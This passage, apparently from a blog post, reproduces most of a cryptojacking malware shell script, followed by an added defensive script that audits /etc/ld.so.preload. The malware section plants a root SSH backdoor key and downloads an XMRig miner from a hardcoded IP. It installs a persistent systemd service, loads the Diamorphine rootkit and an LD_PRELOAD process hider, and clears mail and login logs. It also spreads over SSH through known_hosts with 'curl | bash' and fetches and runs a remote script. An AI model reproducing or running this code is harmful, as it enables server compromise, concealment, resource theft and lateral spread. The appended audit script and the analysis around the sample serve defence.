grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; ${CHATTR} +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || ${CHATTR} -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; ${CHATTR} +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}
download_f(){
config_url=http://205.185.118.246/bWVkaWEK/config.json
miner_url=http://205.185.118.246/bWVkaWEK/xm.tar
export MOHOME="/usr/share"
cd ${MOHOME}
${WGET_CMD} --tries=3 --timeout=10 -O ${MOHOME}/[cmake].pid ${config_url}
echo ${config_url}
if [ -f ${MOHOME}/\[cmake\] ];then
    echo "miner file exists"
else
    ${WGET_CMD} --tries=10 --timeout=10 -O ${MOHOME}/crypto ${miner_url}
    if [ $? -ne 0 ];then
        ${WGET_CMD} --tries=2 --timeout=10 -O ${MOHOME}/crypto ${miner_url_backup}
    fi
    if tar -xf "${MOHOME}/crypto" -C ${MOHOME};then
        mv ${MOHOME}/xmrig ${MOHOME}/[cmake]
        chmod a+x ${MOHOME}/[cmake]
        rm -rf ${MOHOME}/xmrig*
    fi
fi
}
setup_s(){
grep -q cmake /etc/systemd/system/cmake.service
if [ $? -eq 0 ]
then
echo service exist
else
rm -f /etc/systemd/system/cmake.service
cat >/tmp/ext4.service << EOLB
[Unit]
Description=crypto system service
After=network.target
[Service]
Type=forking
GuessMainPID=no
ExecStart=${MOHOME}/[cmake] --config=${MOHOME}/[cmake].pid
WorkingDirectory=${MOHOME}
Restart=always
Nice=0
RestartSec=3
[Install]
WantedBy=multi-user.target
EOLB
fi
mv /tmp/ext4.service /etc/systemd/system/cmake.service
systemctl daemon-reload
systemctl start cmake
systemctl enable cmake
}
exec_f(){
  for nhid in $(ps aux | grep -v grep | grep '/usr/share/\[cmake\]\|masscan' | awk '{print $2}')
  do
    kill -31 $nhid
  done
}
hide_f(){
if [ -d "/usr/src/kernels/$(uname -r)/lib" ]
then
  hi_home=${MOHOME}/..hide
  mkdir -p $hi_home
  if [ ! -d "$hi_home" ]; then mkdir -p $hi_home ; fi
  # hf='...' : base64-encoded tarball of the diamorphine rootkit source, blob removed
  echo $hf|base64 -d >$hi_home/hf.tar
  tar -xf $hi_home/hf.tar -C $hi_home/
  cd $hi_home/
  make
  if [ -f "$hi_home/diamorphine.ko" ]
  then
    insmod diamorphine.ko
  else
    echo "dia hide false"
  fi
else
  echo "other hide method"
fi
}
exec_hide(){
hi_home=/usr/share/..hide
if [ -f "$hi_home/diamorphine.ko" ]
then
   echo "diamorphine loaded1"
   echo "hide diamorphine1"
   exec_f
else
    echo "diamorphine not loaded,execute load process"
    hide_f
    exec_f
fi
}
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- ${mainurl/b.sh} | bash >/dev/null 2>&1 &' & done
fi
}
exec_hide2(){
BINARY_NAME="[cmake]"
H2P=${MOHOME}/..lph
if [ "$UID" = "0" ];then
# LHB_MAKE=... and PROCHIDE=... : base64-encoded Makefile and libprocesshider source; blobs removed, and the page is cut off partway through the second one
sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgYnJlYWs7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgcmV0dXJuIGRpcjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCn0KCkRFQ0xBUkVfUkVBRERJUihkaXJlbnQ2NCwgcmVhZGRpcjY0KTsKREVDTEFSRV9SRUFERElSKGRpcmVudCwgcmVhZGRpcik7Cgo='
mkdir -p ${H2P} 2>/dev/null
echo $LHB_MAKE | base64 -d > ${H2P}/Makefile
echo $PROCHIDE | base64 -d > ${H2P}/processhider.c
sed -i 's/evil_script.py/'$BINARY_NAME'/g' ${H2P}/processhider.c
cd ${H2P}
make 2>/dev/null 1>/dev/null
${CHATTR} -ia / /etc/ /etc/ld.so.preload /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null 1>/dev/null
cp ${H2P}/libprocesshider.so /usr/local/lib/$BINARY_NAME.so 2>/dev/null
#rm -fr ${H2P} 2>/dev/null 1>/dev/null
${CHATTR} +i /usr/local/lib/$BINARY_NAME.so
if [ ! -f "/etc/ld.so.preload" ]; then touch /etc/ld.so.preload; fi
if [ -f /usr/local/lib/$BINARY_NAME.so ]; then cat /etc/ld.so.preload 2>/dev/null 1>/dev/null | grep '/usr/local/lib/'$BINARY_NAME'.so' || echo '/usr/local/lib/'$BINARY_NAME'.so' >> /etc/ld.so.preload;fi
${CHATTR} +i /etc/ld.so.preload
fi
}
exe_remo(){
if [ ! -f "/var/tmp/.psla" ]; then
localgo
echo 'lockfile' > /var/tmp/.psla
sleep 10
${CURL_CMD} -fsSL http://${domain}/s3f815/s/s.sh | sh
${CHATTR} +i /var/tmp/.alsp
history -c
else
  echo "replay .. i know this server ..."
fi
echo "[*] Setup complete"
history -c
}
check_exist
m_command
ins_package
check_exist
SetupNameServers
download_f
setup_s
makesshaxx
clean_monitor
clean_cron
lock_cron
exec_hide
exec_hide2
clmo
exe_remo
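The block above is the last stage of the miner: it compiles processhider.c, drops the result as /usr/local/lib/<name>.so, appends that path to /etc/ld.so.preload and pins both with chattr +i. The following audit is an added example (not from the original post or the malware) that reads an ld.so.preload file and flags entries outside the distribution's library directories; the trusted-directory list and the sample entry are assumptions/constructed values.

```shell
#!/bin/sh
# Added defensive check, not part of the original post or the script above.
# Library directories a distribution normally ships preloadable libraries in
# (assumed list). Anything else, notably /usr/local/lib, /tmp, /var/tmp and
# /dev/shm, is flagged for review.
TRUSTED_LIBDIRS="/lib /lib64 /usr/lib /usr/lib64"

# in_trusted_libdir PATH: true when PATH lives under one of TRUSTED_LIBDIRS.
in_trusted_libdir() {
    for d in $TRUSTED_LIBDIRS; do
        case "$1" in "$d"/*) return 0 ;; esac
    done
    return 1
}

# audit_preload FILE: prints one verdict line per entry (default: /etc/ld.so.preload).
# Returns 0 when the file is absent or every entry is clean, 1 otherwise.
audit_preload() {
    file="${1:-/etc/ld.so.preload}"
    if [ ! -f "$file" ]; then
        echo "[ok] $file does not exist"
        return 0
    fi
    # Show immutable/append-only flags when e2fsprogs is present: the script
    # above uses chattr +i so that a plain rm or editor cannot remove the entry.
    if command -v lsattr >/dev/null 2>&1; then
        lsattr -d "$file" 2>/dev/null | sed 's/^/[attr] /'
    fi
    suspects=0
    # glibc accepts whitespace- or colon-separated entries; normalise to words.
    for lib in $(tr ':' ' ' < "$file"); do
        if ! in_trusted_libdir "$lib"; then
            echo "[SUSPECT] $lib (outside $TRUSTED_LIBDIRS)"
            suspects=$((suspects + 1))
        elif [ ! -f "$lib" ]; then
            echo "[SUSPECT] $lib (listed but missing on disk)"
            suspects=$((suspects + 1))
        else
            echo "[review] $lib (system library dir; confirm it belongs to a package)"
        fi
    done
    [ "$suspects" -eq 0 ]
}

# Constructed sample, not a real artefact: the kind of entry the script above leaves.
tmp=$(mktemp)
printf '%s\n' "/usr/local/lib/example_miner.so" > "$tmp"
if audit_preload "$tmp"; then echo "clean"; else echo "[!] review ld.so.preload"; fi
rm -f "$tmp"
```

Run it against the real file with `audit_preload /etc/ld.so.preload`; a flagged entry still needs `chattr -i` before the line can be removed, as the script above anticipates.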
Corrections are welcome; for other questions, see you in the comments section.